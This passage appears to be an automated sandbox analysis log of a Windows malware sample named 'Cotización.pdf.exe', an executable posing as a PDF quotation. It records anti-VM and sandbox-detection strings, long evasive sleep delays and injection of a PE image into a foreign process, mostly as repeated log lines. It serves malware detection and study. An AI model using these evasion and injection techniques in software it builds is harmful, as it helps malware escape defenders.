              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM3Show sources
              Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 3492, type: MEMORY
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe TID: 3840Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe TID: 4788Thread sleep time: -1440000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,12_2_00403D74
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeThread delayed: delay time: 60000Jump to behavior
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: VMWARE
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_0040317B mov eax, dword ptr fs:[00000030h]12_2_0040317B
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_00402B7C GetProcessHeap,RtlAllocateHeap,12_2_00402B7C
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeMemory written: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess created: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe {path}Jump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess created: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe {path}Jump to behavior
              Source: Cotizaci#U00f3n.pdf.exe, 0000000C.00000002.462567944.0000000001A00000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: Cotizaci#U00f3n.pdf.exe, 0000000C.00000002.462567944.0000000001A00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: Cotizaci#U00f3n.pdf.exe, 0000000C.00000002.462567944.0000000001A00000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: Cotizaci#U00f3n.pdf.exe, 0000000C.00000002.462567944.0000000001A00000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
